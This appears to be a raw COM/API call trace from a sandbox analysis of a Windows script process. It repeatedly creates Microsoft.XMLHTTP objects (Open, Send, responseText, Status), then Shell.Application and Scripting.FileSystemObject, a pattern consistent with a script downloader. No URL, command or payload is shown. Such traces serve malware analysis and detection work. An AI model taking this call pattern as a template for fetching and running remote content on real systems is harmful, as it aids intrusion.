	[0735.716] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0735.716] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0735.716] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0735.716] SysStringLen (param_1=0x0) returned 0x0
	[0735.716] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0735.716] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0735.716] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0735.716] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0735.716] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7548) returned 0x0
	[0735.716] ??2@YAPEAX_K@Z () returned 0x62f330
	[0735.716] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7548, pUnkSite=0x62f330) 
	[0735.716] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0735.717] XMLHTTPRequest:IUnknown:Release (This=0x49c7548) returned 0x0
	[0735.717] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0735.717] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0735.717] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0735.717] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0735.717] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0735.717] longjmp () 
	[0735.717] longjmp () 
	[0735.717] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0735.717] SysStringLen (param_1=0x0) returned 0x0
	[0735.718] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0735.718] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0735.718] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74a0) returned 0x0
	[0735.718] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0735.718] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0735.718] ??2@YAPEAX_K@Z () returned 0x62f310
	[0735.718] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0735.718] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0735.718] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0735.718] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74a0) returned 0x0
	[0735.718] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74a0) returned 0x3
	[0735.718] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0735.719] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0735.719] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0735.719] longjmp () 
	[0735.719] longjmp () 
	[0735.719] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0735.719] SysStringLen (param_1=0x0) returned 0x0
	[0735.719] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0735.719] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0735.719] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0735.720] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0735.720] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0735.720] ??2@YAPEAX_K@Z () returned 0x62f330
	[0735.720] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f330) 
	[0735.720] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0735.720] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0735.720] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0735.720] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0735.720] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0735.720] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0735.720] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0735.720] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0735.721] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0735.721] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0740.670] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0740.670] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0740.670] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0740.671] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0740.671] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0740.671] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0740.671] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0740.671] SysStringLen (param_1=0x0) returned 0x0
	[0740.671] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0740.671] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0740.671] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0740.671] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0740.671] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0740.672] ??2@YAPEAX_K@Z () returned 0x62f350
	[0740.672] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0740.672] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0740.672] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0740.672] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0740.672] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0740.672] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0740.672] SysStringLen (param_1=0x0) returned 0x0
	[0740.672] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0740.677] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0740.677] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0740.677] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0740.677] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0740.677] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0740.677] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0742.215] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0742.215] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0742.215] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0742.217] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0742.217] SysStringLen (param_1=0x0) returned 0x0
	[0742.217] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0742.217] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0742.217] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0742.217] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0742.217] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5aa8) returned 0x0
	[0742.217] ??2@YAPEAX_K@Z () returned 0x62f330
	[0742.217] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5aa8, pUnkSite=0x62f330) 
	[0742.217] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0742.217] XMLHTTPRequest:IUnknown:Release (This=0x49c5aa8) returned 0x0
	[0742.217] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0742.218] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0742.218] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
